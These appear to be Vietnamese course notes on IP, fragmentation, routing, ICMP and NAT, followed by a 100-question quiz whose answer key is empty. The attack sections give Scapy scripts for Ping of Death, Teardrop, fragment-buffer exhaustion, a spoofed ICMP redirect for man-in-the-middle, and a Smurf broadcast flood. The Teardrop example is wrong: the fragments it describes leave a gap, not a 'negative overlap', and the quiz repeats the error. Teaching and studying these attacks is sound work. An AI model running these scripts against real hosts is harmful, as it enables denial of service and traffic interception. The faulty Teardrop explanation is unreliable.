CHƯƠNG 8: NETWORK LAYER - IP - ICMP AND ATTACKS

PHẦN 1: NETWORK LAYER - KHÁI NIỆM CƠ BẢN

1. VAI TRÒ & CHỨC NĂNG

Transport segment từ sending đến receiving host:

Sender:

  • Encapsulates segments thành datagrams
  • Passes to link layer

Receiver:

  • Delivers segments to transport layer protocol

Network layer protocols:

  • Có trong EVERY Internet device: hosts, routers

Routers:

  • Examines header fields trong tất cả IP datagrams
  • Moves datagrams từ input ports đến output ports
  • Transfer datagrams theo end-end path

2. HAI CHỨC NĂNG CHÍNH

A. FORWARDING (Chuyển tiếp)

Định nghĩa:

  • Local, per-router function
  • Move packets từ router’s input link đến appropriate output link

Tương tự:

  • Process of getting through single interchange

B. ROUTING (Định tuyến)

Định nghĩa:

  • Network-wide logic
  • Determine route taken by packets from source to destination
  • Uses routing algorithms

Tương tự:

  • Process of planning trip from source to destination

3. DATA PLANE VS CONTROL PLANE

A. DATA PLANE

Đặc điểm:

  • Local, per-router function
  • Determines how datagram arriving on router input port is forwarded to router output port
  • Uses forwarding table

B. CONTROL PLANE

Đặc điểm:

  • Network-wide logic
  • Determines how datagram is routed among routers along end-end path

Hai approaches:

1. Traditional Routing Algorithms:

  • Implemented IN routers
  • Routing Algorithm components trong mỗi router
  • Interact in control plane

2. Software-Defined Networking (SDN):

  • Implemented in REMOTE servers
  • Remote Controller computes, installs forwarding tables in routers
  • Centralized control

PHẦN 2: IP PROTOCOL

1. IP DATAGRAM FORMAT

Cấu trúc header (20 bytes minimum):

[Ver | IHL | ToS | Total Length]
[Identification | Flags | Fragment Offset]
[TTL | Protocol | Header Checksum]
[Source IP Address]
[Destination IP Address]
[Options (if any)]
[Payload Data]

Các fields quan trọng:

A. VERSION (4 bits)

  • IP protocol version number
  • IPv4 = 4

B. IHL - HEADER LENGTH (4 bits)

  • Header length in 32-bit words
  • Typically = 5 (5 × 4 = 20 bytes)

C. TYPE OF SERVICE (8 bits)

  • DiffServ (bits 0:5)
  • ECN (bits 6:7)

D. TOTAL LENGTH (16 bits)

  • Total datagram length in bytes
  • Maximum: 65,535 bytes (64KB)
  • Typically: 1500 bytes or less
  • Question: Can we overflow this value? → Attacks!

E. IDENTIFICATION (16 bits)

  • Unique ID cho mỗi datagram
  • Dùng cho fragmentation/reassembly

F. FLAGS (3 bits)

  • Bit 0: Reserved (must be 0)
  • Bit 1: DF (Don’t Fragment)
  • Bit 2: MF (More Fragments)

G. FRAGMENT OFFSET (13 bits)

  • Vị trí của fragment trong original datagram
  • Đơn vị: 8-byte blocks
  • Why ÷ 8? Để tiết kiệm bits!

H. TIME-TO-LIVE (TTL) (8 bits)

  • Remaining max hops
  • Decremented at each router
  • When TTL = 0 → router drops packet, sends ICMP Time Exceeded

I. PROTOCOL (8 bits)

  • Upper layer protocol
  • 6 = TCP
  • 17 = UDP
  • 1 = ICMP

J. HEADER CHECKSUM (16 bits)

  • Error detection cho header only (NOT payload)

K. SOURCE IP ADDRESS (32 bits)

  • Sender’s IP

L. DESTINATION IP ADDRESS (32 bits)

  • Receiver’s IP

M. OPTIONS (variable)

  • Timestamp, record route taken, etc.

Overhead:

  • 20 bytes IP + 20 bytes TCP = 40 bytes + app layer overhead

2. TTL VÀ TRACEROUTE

TTL (Time To Live):

  • Mục đích: Prevent infinite loops
  • Decremented tại mỗi router
  • When TTL = 0 → router drops, sends ICMP Type 11 Code 0 (Time Exceeded)

Traceroute hoạt động:

Steps:

  1. Source sends sets of UDP segments to destination:

    • 1st set: TTL = 1
    • 2nd set: TTL = 2
    • 3rd set: TTL = 3, etc.

  2. Datagram in nth set arrives to nth router:

    • Router discards datagram
    • Sends source ICMP message (Type 11, Code 0)
    • ICMP message includes name of router & IP address

  3. When ICMP arrives at source:

    • Record RTTs (Round Trip Times)

Stopping criteria:

  • UDP segment arrives at destination host
  • Destination returns ICMP “port unreachable” (Type 3, Code 3)
  • Source stops

PHẦN 3: IP FRAGMENTATION

1. KHÁI NIỆM

Tại sao cần Fragmentation?

  • Network links có MTU (Max Transfer Size) - largest possible link-level frame
  • Different link types, different MTUs
  • VD: Ethernet = 1500 bytes

Quá trình:

  • Large IP datagram divided (“fragmented”) within net
  • One datagram → several datagrams
  • Reassembled ONLY at destination (NOT at intermediate routers!)
  • IP header bits dùng để identify, order related fragments

2. VÍ DỤ FRAGMENTATION

Scenario: 4000-byte datagram, MTU = 1500 bytes

Original datagram:

ID = x
Offset = 0
Flag = 0
Length = 4000

Sau fragmentation:

Fragment 1:

ID = x
Offset = 0
Flag = 1 (More Fragments)
Length = 1500
Data = 1480 bytes (1500 - 20 header)

Fragment 2:

ID = x
Offset = 185 (1480 ÷ 8)
Flag = 1
Length = 1500
Data = 1480 bytes

Fragment 3:

ID = x
Offset = 370 (2960 ÷ 8)
Flag = 0 (Last Fragment)
Length = 1040
Data = 1020 bytes

Lưu ý:

  • Offset = data_bytes ÷ 8
  • Fragment 1: offset = 0
  • Fragment 2: offset = 1480 ÷ 8 = 185
  • Fragment 3: offset = (1480 + 1480) ÷ 8 = 370

Why offset ÷ 8?

  • Offset field chỉ có 13 bits
  • Max value = 8191
  • Nếu không ÷ 8 → chỉ address được 8191 bytes
  • Với ÷ 8 → address được 8191 × 8 = 65,528 bytes (gần 64KB)

3. CONSTRUCT IP FRAGMENTS BẰNG SCAPY

from scapy.all import *

# Fragment 1
ip1 = IP(dst="10.9.0.5", id=1000, flags=1, frag=0, proto=17)
udp = UDP(sport=7070, dport=9090)
data1 = "A" * 1000
pkt1 = ip1/udp/data1

# Fragment 2
ip2 = IP(dst="10.9.0.5", id=1000, flags=0, frag=125, proto=17)
data2 = "B" * 500
pkt2 = ip2/Raw(load=data2)

send(pkt1)
send(pkt2)

Giải thích:

  • flags = 1: More Fragments
  • flags = 0: Last Fragment
  • frag = offset value
  • proto = 17: UDP
  • id phải giống nhau cho tất cả fragments

PHẦN 4: ATTACKS USING IP FRAGMENTATION

1. PROTOCOL VIOLATION

Khái niệm:

  • Protocols Are Rules
  • Attackers Like to Break Rules
  • Robust Programs phải Handle Rule Violations

Câu hỏi attack:

Q1: Can you create IP packet larger than 65,536 bytes (64KB)?

Q2: Can you create abnormal conditions using offset và payload size?

Q3: Can you use small bandwidth to tie up target’s significant resources?

2. PING OF DEATH (PoD) ATTACK

Attack 1: Create Super-Large Packet

Idea: Violate IP protocol → buffer overflow

Cách:

  • Last fragment có:
    • offset = (65536 - 8) ÷ 8 = 8191
    • total_length = 1000

Tính toán:

Real size = offset × 8 + (total_length - 20 - 8)
          = 65528 + 972
          = 66,500 bytes > 65,536 bytes!

Kết quả:

  • Vượt quá max IP packet size
  • Cause buffer overflow at victim
  • System crash

Code example:

from scapy.all import *

# Create super-large packet
ip = IP(dst="victim_ip")
icmp = ICMP()

# Last fragment
ip_frag = IP(dst="victim_ip", id=12345, flags=0, frag=8191)
payload = "X" * 1000
pkt = ip_frag/ICMP()/payload

send(pkt)

Recent PoD vulnerability:

  • CVE-2020-16898 (Windows TCP/IP Stack)
  • ICMPv6 Router Advertisement packets
  • Remote Code Execution!

Mitigation:

  • Validate total reassembled packet size
  • Drop packets exceeding limits
  • Update/patch systems

3. TEARDROP ATTACK

Attack 2: Create Abnormal Situations

Goal: Test whether computer can handle overlapping fragments

Normal fragments:

Fragment 1: offset = 0,   length = 820
Fragment 2: offset = 200, length = 820

Check:

End of Fragment 1 = 0 + 820 = 820
Start of Fragment 2 = 200 × 8 = 1600
Gap = 1600 - 820 = 780 bytes → OK!

Teardrop attack:

Fragment 1: offset = 0,   length = 820
Fragment 2: offset = 600, length = 820

Check:

End of Fragment 1 = 0 + 820 = 820
Start of Fragment 2 = 600 × 8 = 4800
Overlap = 820 - 4800 = -3980 (NEGATIVE!)

Kết quả:

  • Negative overlap → HUGE unsigned value
  • Cannot reassemble
  • System crash hoặc unexpected behavior

Code:

# Fragment 1
ip1 = IP(dst="victim", id=1000, flags=1, frag=0)
data1 = "A" * 800
pkt1 = ip1/ICMP()/data1

# Fragment 2 - OVERLAPPING!
ip2 = IP(dst="victim", id=1000, flags=0, frag=600)
data2 = "B" * 800
pkt2 = ip2/Raw(load=data2)

send(pkt1)
send(pkt2)

4. DENIAL OF SERVICE (DoS) VỚI FRAGMENTATION

Attack 3: Tie Up Target’s Resources

Idea: Small bandwidth → significant resources

Cách:

Packet 1: offset = 0 (first fragment)
Packet 2: offset ≈ 65535 ÷ 8 (last fragment)

Tác động:

Approach 1 (Static buffer):

  • Target allocates 64KB buffer chờ all fragments
  • Send 2 tiny packets (~100 bytes each)
  • Tie up 64KB resources on server!

Approach 2 (Linked list):

  • More complicated, time to implement
  • Still consumes resources

Kết quả:

  • Very efficient DoS attack
  • Small bandwidth → Large resource consumption

Code:

# Fragment 1 - first
ip1 = IP(dst="victim", id=1000, flags=1, frag=0)
pkt1 = ip1/ICMP()/"A"*50

# Fragment 2 - last (huge offset!)
ip2 = IP(dst="victim", id=1000, flags=0, frag=8190)
pkt2 = ip2/Raw(load="B"*50)

send(pkt1)
send(pkt2)
# Target allocates 64KB buffer, waits forever for middle fragments!

PHẦN 5: ROUTING

1. ROUTING TABLE

Linux routing commands:

Show routing table:

ip route

Add route:

sudo ip route add 192.168.60.0/24 dev enp0s3 via 10.0.2.7

Delete route:

sudo ip route del 192.168.60.0/24

2. ROUTING RULES - LONGEST MATCH

Example routing table:

A: 0.0.0.0/0         dev interface-a  (default route)
B: 192.168.0.0/16    dev interface-b
C: 192.168.60.0/24   dev interface-a
D: 192.168.60.5/32   dev interface-d

Question: Interface nào được dùng cho:

1. 192.200.60.5?

  • Match: A (0.0.0.0/0)
  • Answer: interface-a (default route)

2. 192.168.30.5?

  • Match: A (0.0.0.0/0), B (192.168.0.0/16)
  • Longest match: B (/16 > /0)
  • Answer: interface-b

3. 192.168.60.5?

  • Match: A (0.0.0.0/0), B (192.168.0.0/16), C (192.168.60.0/24), D (192.168.60.5/32)
  • Longest match: D (/32 > /24 > /16 > /0)
  • Answer: interface-d

Bottom line: Pick the LONGEST MATCH!

3. ROUTING TABLE CONFIGURATION

For Routers:

  • Routing protocols (e.g., OSPF, BGP)
  • Attacks on routing protocols (will be discussed)

For Hosts (tiny routing table):

  • DHCP (IP, DNS, router info)
  • Default routers
  • Manual configuration (static routes)
  • ICMP redirect messages

4. REVERSE PATH FILTERING (RPF)

Threat: Spoofing from outside network

  • Outside attacker sử dụng internal source IP
  • Pretending to be inside → cause damage

Router’s protection: RPF

Symmetric routing:

  1. Router R receives packet from interface A
  2. Do reverse lookup: Nếu return path to src_ip đi qua cùng interface A?
    • YESAllow (symmetric)
    • NODrop (asymmetric)

Related term: Reverse-Path Forwarding (RPF)

Lưu ý:

  • Very obscure and important rule inside Linux Kernel
  • Provides protection against packet spoofing

Demo - spoofing sẽ bị RPF drop:

# Spoof packet from outside with internal src IP
ip = IP(src="10.0.2.5", dst="192.168.60.5")  # Internal src, external dst
send(ip/ICMP())
# Router sẽ drop vì reverse path không match incoming interface!

PHẦN 6: ICMP PROTOCOL

1. MỤC ĐÍCH

ICMP (Internet Control Message Protocol):

  • Used by hosts and routers to communicate network-level information

Chức năng:

Error reporting:

  • Unreachable host, network, port, protocol
  • Time exceeded (TTL = 0)

Control messages:

  • Echo request/reply (ping)
  • Redirect
  • Timestamp request/reply
  • Router advertisement/solicitation

Đặc điểm:

  • ICMP messages carried in IP datagrams
  • ICMP message: type, code + first 8 bytes of IP datagram causing error

2. ICMP MESSAGE TYPES

Các loại quan trọng:

TypeCodeDescription
00Echo Reply (ping)
30Dest Network Unreachable
31Dest Host Unreachable
32Dest Protocol Unreachable
33Dest Port Unreachable
36Dest Network Unknown
37Dest Host Unknown
40Source Quench (congestion - deprecated)
80Echo Request (ping)
90Router Advertisement
100Router Discovery
110TTL Expired
120Bad IP Header

3. ICMP ECHO REQUEST/REPLY (PING)

Workflow:

Host A → Echo Request (Type 8) → Host B
Host B → Echo Reply (Type 0) → Host A

Scapy:

# Echo Request
ip = IP(dst="10.9.0.5")
icmp = ICMP(type=8, code=0)
send(ip/icmp)

# Echo Reply
ip = IP(dst="10.9.0.6")
icmp = ICMP(type=0, code=0)
send(ip/icmp)

4. ICMP TIME EXCEEDED

When TTL = 0:

  • Router drops packet
  • Sends ICMP Type 11, Code 0 (Time Exceeded) to source
  • Includes first 8 bytes of original IP datagram

Traceroute sử dụng!

5. ICMP DESTINATION UNREACHABLE

Type 3, various codes:

  • Code 0: Network Unreachable
  • Code 1: Host Unreachable
  • Code 2: Protocol Unreachable
  • Code 3: Port Unreachable (UDP port not listening)

6. ICMP REDIRECT

Mục đích: Tell host về better route

Scenario:

Host A → Router R1 → Router R2 → Host B

R1 knows: Better route = direct to R2
R1 sends ICMP Redirect to A: "Use R2 for B"

ICMP Redirect message:

  • Type 5, Code 0
  • Contains: Better gateway IP address

Scapy:

ip = IP(src="10.9.0.11", dst="10.9.0.5")  # Router → Host
icmp = ICMP(type=5, code=0)
icmp.gw = "10.9.0.111"  # New gateway IP
send(ip/icmp/original_ip_header)

Attacker → MITM Attack using ICMP Redirect!

PHẦN 7: ICMP REDIRECT ATTACK

1. ATTACK CODE

#!/usr/bin/env python3
from scapy.all import *

# Victim: 10.9.0.5
# Fake gateway: 10.9.0.111 (attacker-controlled)
# Original gateway: 10.9.0.11

# Spoof ICMP Redirect from gateway to victim
ip = IP(src="10.9.0.11", dst="10.9.0.5")
icmp = ICMP(type=5, code=0)
icmp.gw = "10.9.0.111"  # Redirect to attacker

# Include original IP header (first 8 bytes of triggering packet)
# Victim was sending to some destination
orig_ip = IP(src="10.9.0.5", dst="192.168.60.5")
orig_icmp = ICMP()

send(ip/icmp/orig_ip/orig_icmp)

Kết quả:

  • Victim updates routing table
  • Traffic to 192.168.60.0/24 → goes through 10.9.0.111 (attacker)
  • MITM attack!

2. LIMITATIONS

Question 1: Can you launch ICMP redirect from remote computer?

Answer: NO!

  • When receiving ICMP Redirect, host checks if gateway is on same network
  • If NOT → ignore

Question 2: Can you redirect to remote computer?

Answer: NO!

  • Reverse Path Filtering (RPF) at router will drop spoofed packets
  • New gateway phải on same subnet

Bottom line:

  • ICMP Redirect chỉ hoạt động locally (same LAN)

PHẦN 8: DoS ATTACKS USING ICMP

1. SMURF ATTACK

Attack idea:

Step 1: Spoof ICMP Echo Request

  • Source IP = Victim’s IP (spoofed!)
  • Destination = Broadcast address (VD: 10.9.0.255)

Step 2: All hosts on network receive

  • Think victim sent Echo Request
  • All reply to victim with Echo Reply!

Step 3: Victim overwhelmed

  • Receives hundreds/thousands of Echo Replies
  • Denial of Service!

Diagram:

Attacker → Spoofed Echo Request (src=Victim, dst=Broadcast)
         → All hosts on network receive
         → All hosts reply to Victim
         → Victim OVERWHELMED!

Code:

# Smurf attack
ip = IP(src="victim_ip", dst="10.9.0.255")  # Broadcast
icmp = ICMP(type=8)  # Echo Request
send(ip/icmp)

# All hosts reply to victim!

Demo: Ping broadcast address

ping -b 10.9.0.255
# What happened?

Prevention:

  • Configure routers to NOT forward broadcast packets
  • Disable ICMP Echo Reply to broadcast addresses
  • Rate limiting

2. ICMP FLOODING

Attack:

  • Send massive amount of ICMP Echo Requests
  • Overwhelm victim’s bandwidth/processing

Tools:

  • hping3, ping with high rate

Prevention:

  • Rate limiting ICMP
  • Firewall rules

3. RECONNAISSANCE

Using ICMP for network mapping:

  • Ping sweep: Discover live hosts
  • Traceroute: Map network topology
  • ICMP Timestamp: Get system time

Tools:

  • nmap -sn (ping scan)
  • traceroute

PHẦN 9: NAT (NETWORK ADDRESS TRANSLATION)

1. KHÁI NIỆM

Mục đích:

  • All devices in local network share ONE IPv4 address (as far as outside world concerned)

Cách hoạt động:

Local network:

10.0.0.1
10.0.0.2
10.0.0.3
10.0.0.4 (NAT router)

Outside world thấy:

138.76.29.7 (public IP)

2. NAT TRANSLATION

Outgoing:

  1. Host 10.0.0.1:3345 → 128.119.40.186:80
  2. NAT router changes:
    • Source: 10.0.0.1:3345 → 138.76.29.7:5001
    • Destination: 128.119.40.186:80 (giữ nguyên)
  3. Updates NAT translation table:
    WAN side          | LAN side
138.76.29.7:5001  | 10.0.0.1:3345

Incoming:

  1. Reply: 128.119.40.186:80 → 138.76.29.7:5001
  2. NAT router looks up table:
    • 138.76.29.7:5001 → 10.0.0.1:3345
  3. Changes destination:
    • 128.119.40.186:80 → 10.0.0.1:3345
  4. Delivers to internal host

Đặc điểm:

  • Datagrams leaving local network: same source NAT IP, different source ports
  • Datagrams inside network: 10.0.0/24 addresses (as usual)

NGÂN HÀNG CÂU HỎI CHƯƠNG 8

PHẦN 1: NETWORK LAYER BASICS

Câu 1: Network layer transport gì?

A. Frames

B. Segments from sending to receiving host

C. Bits

D. Messages

Câu 2: Sender encapsulates gì thành datagrams?

A. Frames

B. Segments

C. Packets

D. Messages

Câu 3: Network layer protocols có ở đâu?

A. Chỉ routers

B. Chỉ hosts

C. Every Internet device: hosts, routers

D. Chỉ switches

Câu 4: Routers examines gì trong datagrams?

A. Chỉ destination IP

B. Header fields

C. Chỉ payload

D. Chỉ checksum

Câu 5: Forwarding là gì?

A. Planning trip

B. Move packets from input link to output link (local, per-router)

C. Global routing

D. Error correction

Câu 6: Routing là gì?

A. Local forwarding

B. Determine route from source to destination (network-wide logic)

C. Error checking

D. Compression

Câu 7: Forwarding tương tự như gì?

A. Planning entire trip

B. Getting through single interchange

C. Choosing destination

D. Buying ticket

Câu 8: Routing tương tự như gì?

A. Driving through one intersection

B. Planning trip from source to destination

C. Stopping at one place

D. Refueling

Câu 9: Data plane là gì?

A. Global logic

B. Local, per-router function - forwarding

C. Remote control

D. Application layer

Câu 10: Control plane là gì?

A. Local forwarding

B. Network-wide logic - routing

C. Data transmission

D. Error handling

Câu 11: Hai approaches của Control plane?

A. Fast and Slow

B. Traditional routing algorithms VÀ SDN

C. Manual and Automatic

D. Wired and Wireless

Câu 12: Traditional routing algorithms implemented ở đâu?

A. Remote servers

B. IN routers

C. Cloud

D. Hosts only

Câu 13: SDN (Software-Defined Networking) implemented ở đâu?

A. In routers

B. Remote servers

C. Switches

D. Hosts

Câu 14: SDN, ai computes forwarding tables?

A. Each router independently

B. Remote Controller

C. Switches

D. Hosts

PHẦN 2: IP DATAGRAM FORMAT

Câu 15: IP header minimum size?

A. 8 bytes

B. 20 bytes

C. 32 bytes

D. 40 bytes

Câu 16: IP Version field cho IPv4?

A. 1

B. 2

C. 4

D. 6

Câu 17: IHL (Header Length) đơn vị?

A. Bytes

B. 32-bit words

C. Bits

D. KB

Câu 18: IHL typically bằng bao nhiêu?

A. 4

B. 5 (5 × 4 = 20 bytes)

C. 10

D. 20

Câu 19: Total Length field có bao nhiêu bits?

A. 8

B. 16

C. 32

D. 64

Câu 20: Maximum IP datagram size?

A. 1500 bytes

B. 65,535 bytes (64KB)

C. 1 MB

D. Unlimited

Câu 21: Typically IP datagram size?

A. 64 KB

B. 1500 bytes or less

C. 100 bytes

D. 10 KB

Câu 22: Flags field có bao nhiêu bits?

A. 1

B. 2

C. 3

D. 8

Câu 23: MF flag nghĩa là gì?

A. Must Forward

B. More Fragments

C. Maximum Forward

D. Minimum Fragments

Câu 24: Fragment Offset field có bao nhiêu bits?

A. 8

B. 13

C. 16

D. 32

Câu 25: Fragment Offset đơn vị?

A. Bytes

B. 8-byte blocks

C. Bits

D. 32-bit words

Câu 26: Tại sao Fragment Offset ÷ 8?

A. Faster calculation

B. Tiết kiệm bits, address được 65,528 bytes thay vì 8,191

C. Easier to understand

D. Random choice

Câu 27: TTL là gì?

A. Total Transfer Length

B. Time To Live - remaining max hops

C. Type To Link

D. Transport Layer Level

Câu 28: TTL được làm gì tại mỗi router?

A. Tăng lên 1

B. Decremented (giảm đi 1)

C. Giữ nguyên

D. Reset về 255

Câu 29: When TTL = 0, router làm gì?

A. Forward packet

B. Drops packet, sends ICMP Time Exceeded

C. Increase TTL

D. Broadcast packet

Câu 30: Protocol field = 6 nghĩa là gì?

A. UDP

B. TCP

C. ICMP

D. IP

Câu 31: Protocol field = 17 nghĩa là gì?

A. TCP

B. UDP

C. ICMP

D. ARP

Câu 32: Protocol field = 1 nghĩa là gì?

A. TCP

B. UDP

C. ICMP

D. HTTP

Câu 33: Header Checksum check gì?

A. Entire datagram

B. Header only (NOT payload)

C. Chỉ payload

D. Chỉ Source IP

Câu 34: IP overhead với TCP?

A. 20 bytes

B. 40 bytes

C. 20 bytes IP + 20 bytes TCP = 40 bytes + app overhead

D. 60 bytes

PHẦN 3: TTL & TRACEROUTE

Câu 35: TTL mục đích chính?

A. Security

B. Prevent infinite loops

C. Encryption

D. Compression

Câu 36: Traceroute gửi gì đến destination?

A. ICMP

B. TCP

C. UDP segments

D. ARP

Câu 37: Traceroute 1st set có TTL bao nhiêu?

A. 0

B. 1

C. 64

D. 255

Câu 38: Traceroute 2nd set có TTL bao nhiêu?

A. 1

B. 2

C. 10

D. 20

Câu 39: nth router sends ICMP message type/code nào?

A. Type 0, Code 0

B. Type 11, Code 0 (Time Exceeded)

C. Type 3, Code 3

D. Type 8, Code 0

Câu 40: Traceroute stops khi nào?

A. TTL = 255

B. Destination returns ICMP Type 3 Code 3 (Port Unreachable)

C. No reply

D. After 10 hops

PHẦN 4: IP FRAGMENTATION

Câu 41: MTU là gì?

A. Minimum Transfer Unit

B. Max Transfer Size - largest possible link-level frame

C. Multiple Transfer Unit

D. Media Type Unit

Câu 42: Ethernet MTU typically?

A. 576 bytes

B. 1500 bytes

C. 4000 bytes

D. 64 KB

Câu 43: IP datagram được reassembled ở đâu?

A. First router

B. Every router

C. ONLY at destination

D. Source

Câu 44: Fragment 1 của 4000-byte datagram (MTU=1500), Length?

A. 4000

B. 1500

C. 1480

D. 20

Câu 45: Fragment 1, Data size (không tính header)?

A. 1500

B. 1480 (1500 - 20)

C. 1460

D. 20

Câu 46: Fragment 2 offset (sau 1480 bytes data)?

A. 1480

B. 185 (1480 ÷ 8)

C. 200

D. 1500

Câu 47: Last fragment có flag gì?

A. 1

B. 0 (No More Fragments)

C. 2

D. 3

Câu 48: Middle fragments có flag gì?

A. 0

B. 1 (More Fragments)

C. 2

D. 3

PHẦN 5: IP FRAGMENTATION ATTACKS

Câu 49: Protocol Violation nghĩa là gì?

A. Following rules

B. Breaking protocol rules

C. Encrypting data

D. Compressing packets

Câu 50: Ping of Death attack làm gì?

A. Send normal pings

B. Create IP packet LARGER than 65,536 bytes

C. Delete packets

D. Encrypt packets

Câu 51: PoD attack cause gì?

A. Slow network

B. Buffer overflow

C. Fast forwarding

D. Encryption error

Câu 52: Last fragment với offset=8191, length=1000, real size?

A. 65,536

B. 66,500 bytes (> 65,536!)

C. 64,000

D. 8,191

Câu 53: CVE-2020-16898 là gì?

A. ARP vulnerability

B. Windows TCP/IP Stack PoD in ICMPv6

C. DNS bug

D. HTTP flaw

Câu 54: Teardrop attack tạo gì?

A. Normal fragments

B. Overlapping fragments

C. Encrypted fragments

D. Compressed fragments

Câu 55: Teardrop: Fragment 1 offset=0 length=820, Fragment 2 offset=600, overlap?

A. No overlap

B. Gap

C. Negative overlap (HUGE unsigned value)

D. Perfect fit

Câu 56: DoS với fragmentation, send bao nhiêu packets?

A. Thousands

B. Millions

C. 2 tiny packets (~100 bytes each)

D. One large packet

Câu 57: DoS fragmentation tie up bao nhiêu resources?

A. 100 bytes

B. 1 KB

C. 64 KB

D. 1 MB

Câu 58: Fragmentation DoS efficient vì sao?

A. Fast

B. Small bandwidth → Large resource consumption

C. Encrypted

D. Compressed

PHẦN 6: ROUTING

Câu 59: Linux command để show routing table?

A. ifconfig

B. netstat

C. ip route

D. route -n

Câu 60: Linux command để add route?

A. route add

B. sudo ip route add

C. ifconfig add

D. netstat add

Câu 61: Routing rule chính?

A. First match

B. Longest match

C. Shortest match

D. Random

Câu 62: 192.168.60.5 match với: /0, /16, /24, /32. Chọn nào?

A. /0

B. /16

C. /24

D. /32 (longest!)

Câu 63: Routers configure routing table bằng gì?

A. Chỉ manual

B. Routing protocols (OSPF, BGP)

C. Chỉ DHCP

D. Chỉ DNS

Câu 64: Hosts configure routing table bằng gì?

A. Chỉ routing protocols

B. DHCP, default routers, manual, ICMP redirect

C. Chỉ DHCP

D. Chỉ manual

Câu 65: RPF viết tắt của gì?

A. Rapid Packet Forwarding

B. Reverse Path Filtering / Reverse-Path Forwarding

C. Random Protocol Function

D. Router Protection Feature

Câu 66: RPF bảo vệ chống gì?

A. Virus

B. Packet spoofing

C. DDoS only

D. Encryption

Câu 67: RPF hoạt động như thế nào?

A. Block all packets

B. Reverse lookup: return path same interface → Allow, else Drop

C. Forward all

D. Encrypt packets

Câu 68: Symmetric routing trong RPF?

A. Drop packet

B. Allow packet (return path same interface)

C. Encrypt packet

D. Broadcast packet

Câu 69: Asymmetric routing trong RPF?

A. Allow packet

B. Drop packet (return path different interface)

C. Forward packet

D. Modify packet

PHẦN 7: ICMP PROTOCOL

Câu 70: ICMP viết tắt của gì?

A. Internet Connection Management Protocol

B. Internet Control Message Protocol

C. Internal Communication Message Protocol

D. IP Control Management Protocol

Câu 71: ICMP được dùng bởi ai?

A. Chỉ hosts

B. Chỉ routers

C. Hosts VÀ routers

D. Chỉ switches

Câu 72: ICMP communicate gì?

A. Application data

B. Network-level information

C. Chỉ errors

D. Chỉ routing

Câu 73: ICMP messages được carried trong gì?

A. Ethernet frames only

B. IP datagrams

C. TCP segments

D. UDP packets

Câu 74: ICMP Type 0 Code 0 là gì?

A. Echo Request

B. Echo Reply (ping)

C. Time Exceeded

D. Unreachable

Câu 75: ICMP Type 8 Code 0 là gì?

A. Echo Reply

B. Echo Request (ping)

C. Time Exceeded

D. Unreachable

Câu 76: ICMP Type 11 Code 0 là gì?

A. Echo Reply

B. Unreachable

C. TTL Expired / Time Exceeded

D. Redirect

Câu 77: ICMP Type 3 Code 3 là gì?

A. Network Unreachable

B. Host Unreachable

C. Dest Port Unreachable

D. Echo Reply

Câu 78: ICMP Type 5 Code 0 là gì?

A. Echo Request

B. Time Exceeded

C. Redirect

D. Unreachable

Câu 79: Ping sử dụng ICMP type nào?

A. Type 11

B. Type 8 (Request) và Type 0 (Reply)

C. Type 3

D. Type 5

Câu 80: Traceroute sử dụng ICMP type nào để receive?

A. Type 0

B. Type 8

C. Type 11 (Time Exceeded)

D. Type 5

PHẦN 8: ICMP REDIRECT ATTACK

Câu 81: ICMP Redirect mục đích legitimate?

A. Attack only

B. Tell host về better route

C. Encrypt traffic

D. Block traffic

Câu 82: ICMP Redirect contains gì?

A. Entire routing table

B. Better gateway IP address

C. All routes

D. DNS info

Câu 83: ICMP Redirect Type và Code?

A. Type 0, Code 0

B. Type 8, Code 0

C. Type 5, Code 0

D. Type 11, Code 0

Câu 84: Attacker dùng ICMP Redirect để?

A. DoS

B. MITM attack

C. Sniffing only

D. Encryption

Câu 85: ICMP Redirect có thể launch từ remote không?

A. Có

B. KHÔNG - host checks gateway on same network

C. Tùy firewall

D. Chỉ với VPN

Câu 86: ICMP Redirect có thể redirect đến remote computer không?

A. Có

B. KHÔNG - RPF drops, gateway must be same subnet

C. Tùy router

D. Chỉ TCP

Câu 87: ICMP Redirect hoạt động ở đâu?

A. Globally

B. Locally (same LAN)

C. Internet-wide

D. Cloud only

PHẦN 9: SMURF ATTACK & ICMP DoS

Câu 88: Smurf attack sử dụng gì?

A. TCP SYN

B. ICMP Echo Request to broadcast address

C. UDP flood

D. ARP poisoning

Câu 89: Smurf attack spoofs gì?

A. Destination IP

B. Source IP = Victim’s IP

C. MAC address

D. Port number

Câu 90: Smurf attack destination?

A. Unicast

B. Broadcast address

C. Multicast

D. Loopback

Câu 91: Smurf attack, all hosts làm gì?

A. Ignore

B. Forward

C. Reply to victim with Echo Reply

D. Block

Câu 92: Smurf attack cause gì cho victim?

A. Speed up

B. Overwhelmed with Echo Replies - DoS

C. Security improvement

D. Nothing

Câu 93: Prevention cho Smurf attack?

A. Use TCP

B. Configure routers to NOT forward broadcast packets, disable ICMP to broadcast

C. Use VPN

D. Stronger passwords

Câu 94: ICMP Flooding là gì?

A. Normal pings

B. Send massive amount of ICMP Echo Requests

C. One ping

D. Encrypted ICMP

Câu 95: ICMP dùng cho Reconnaissance như thế nào?

A. Not possible

B. Ping sweep: discover live hosts; Traceroute: map topology

C. Chỉ encryption

D. Chỉ authentication

PHẦN 10: NAT

Câu 96: NAT viết tắt của gì?

A. Network Authentication Technology

B. Network Address Translation

C. New Advanced Transmission

D. National Address Table

Câu 97: NAT cho phép gì?

A. Faster Internet

B. All devices in local network share ONE IPv4 address

C. More security only

D. Encryption

Câu 98: Datagrams leaving local network có gì giống nhau?

A. Destination

B. Same source NAT IP, different source ports

C. Protocol

D. TTL

Câu 99: NAT translation table chứa gì?

A. Chỉ IP addresses

B. Chỉ ports

C. WAN side addr:port ↔ LAN side addr:port

D. MAC addresses

Câu 100: NAT router làm gì với outgoing packet?

A. Chỉ forward

B. Changes source IP:port to NAT public IP:new port, updates table

C. Drops packet

D. Encrypts packet

ĐÁP ÁN NHANH

